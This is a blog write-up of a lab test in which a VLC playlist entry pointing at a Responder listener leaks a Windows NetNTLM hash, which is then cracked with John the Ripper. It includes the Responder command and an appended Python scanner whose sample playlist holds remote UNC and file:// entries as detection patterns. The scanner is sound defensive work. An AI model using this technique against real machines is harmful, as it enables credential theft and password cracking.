NetNTLM Hash Leak via VLC Player

Hi readers, since one of my idols tweeted some time back that it is possible to get a NetNTLM hash using a .m3u file, I decided to try it out and do a simple write-up.

The figure below shows the yappare tweet:

Yappare tweet.

To get the NetNTLM hash, we need to create a .m3u (playlist) file. As can be seen in the figure below, the .m3u file contains a path to a song on my desktop and the Responder IP address.

P.S: Your playlist (.m3u) can play songs via URL.

When the file is opened in VLC Player, it plays the first song. Once the song ends or the next button is clicked, VLC moves on to the entry with the Responder IP address, and the author is able to receive the NetNTLM hash.

Creating .m3u file.

After creating the .m3u file, make sure you have downloaded Responder. To run Responder, enter the following command in the terminal:

./Responder.py -I eth0

The figure below shows that Responder is listening for events:

Responder listening for events.

Once Responder is listening for events, open the created file with VLC Player. Once the song ends or the next button is clicked, VLC Player will show the user the following error message.

VLC Player error message.

While the error message is shown to the user, the auditor has received the NetNTLM hash, as shown in the figure below:

Responder received NTLM hash.

With the received NetNTLM hash, an attacker can run John the Ripper in order to crack the password. The figure below shows that my Win 10 (virtual machine) password is 1337.

P.S: The password was set just for this write-up 😉.

Password cracked successfully.
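
A defensive check for the playlist described above, as an added example that is not part of the original post: it scans .m3u text before the file is opened and flags entries that would make a Windows client contact a remote host over SMB. The flagged entry forms, the function names and the sample playlist (192.0.2.10 is a documentation address) are assumptions, since the post shows its playlist only as a figure.

```python
import re
from urllib.parse import urlsplit

# UNC-style entry (\\host\share or //host/share). The lookahead skips the
# local device prefixes \\?\ and \\.\ which do not name a remote host.
UNC_RE = re.compile(r'^(?:\\\\|//)(?!\?\\|\.\\)([^\\/]+)[\\/]')

def remote_smb_host(entry):
    """Return the remote host an entry would reach over SMB, or None."""
    entry = entry.strip()
    m = UNC_RE.match(entry)
    if m:
        return m.group(1)
    parts = urlsplit(entry)
    scheme = parts.scheme.lower()
    if scheme == "smb" and parts.hostname:
        return parts.hostname
    # file://host/share/... names a remote host; file:///C:/... is local.
    if scheme == "file" and parts.hostname not in (None, "", "localhost"):
        return parts.hostname
    return None

def scan_playlist(text):
    """Return (line_number, entry, host) for every entry pointing at a remote SMB host."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # blank lines and #EXTM3U / #EXTINF directives
        host = remote_smb_host(line)
        if host:
            findings.append((n, line.strip(), host))
    return findings

# Constructed sample playlist, not the one from the post's figure.
SAMPLE = "\n".join([
    "#EXTM3U",
    r"C:\Users\user\Desktop\song.mp3",    # local file: not flagged
    r"\\192.0.2.10\share\next.mp3",       # UNC path: flagged
    "file://192.0.2.10/share/next.mp3",   # file URL with a host: flagged
    "https://example.com/stream.mp3",     # HTTP(S) is outside this check
])

if __name__ == "__main__":
    for line_no, entry, host in scan_playlist(SAMPLE):
        print(f"line {line_no}: {entry} -> SMB connection to {host}")
```

A hit means the playlist should not be opened on a domain-joined Windows machine; blocking outbound SMB (TCP 445) at the network edge stops the connection even if it is.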
